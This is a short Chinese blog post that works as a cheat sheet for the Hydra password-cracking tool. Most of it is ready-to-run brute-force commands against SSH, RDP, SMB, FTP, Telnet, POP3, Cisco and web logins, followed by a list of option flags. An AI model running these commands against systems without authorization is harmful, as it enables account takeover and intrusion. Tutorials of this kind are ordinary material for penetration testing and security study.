渗透工具——Hydra破解弱密码

Posted 2021-11-02 Thgilil

Hydra是一个自动化爆破工具，暴力破解弱密码，是一个支持众多协议的爆破工具，kali中以集成。

1.对ssh进行爆破

hydra -L user.txt -P password.txt ssh://192.168.3.163

-s 指定端口

hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 7744

2.将破解密码保存到指定文件

hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 40 -o ssh.txt

使用hydra破解ssh的密码

hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

破解https：

hydra -m /index.php -l username -P pass.txt IP https

破解teamspeak：

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco：

hydra -P pass.txt IP cisco # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb：

hydra -l administrator -P pass.txt IP smb

破解pop3：

hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp：

hydra IP rdp -l administrator -P pass.txt -V

破解http-proxy：

hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解telnet

hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

破解ftp：

hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

get方式提交，破解web登录：

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get

重要参数：

-s    Port 使用非默认服务器端口而是其他端口时，指定其端口
-l    Login 已经获取登录ID的情况下输入登录ID
-L    FILE 未获取登录ID情况下指定用于暴力破解的文件（需要指出全路径）
-p    Pass 已经获取登录密码的情况下输入登录密码
-P    FILE 未获取登录密码的情况下指定用于暴力破解的文件（需要指出全路径）
-f    查找到第一个可以使用的ID和密码的时候停止破解
-o    FILE以STDOUT的形式输出结果值
-t 指定多线程数量，默认为16个线程


-R    修复之前使用的aborted/crashed session
-S    执行SSL(Secure Socket Layer)连接
-w    指定每个线程的回应时间（Waittime）(默认值：32秒)
-U    查看服务器组件使用明细
-4/6  指定IPv4/IPv6(默认值：IPv4)
-C    FILE 用于指定由冒号区分形式的暴力破解专用文件，即ID:Password形式
-x    MIN:MAX:CHARSET 暴力破解时不指定文件，而生可以满足指定字符集和最短、最长长度条件的密码来尝试暴力破解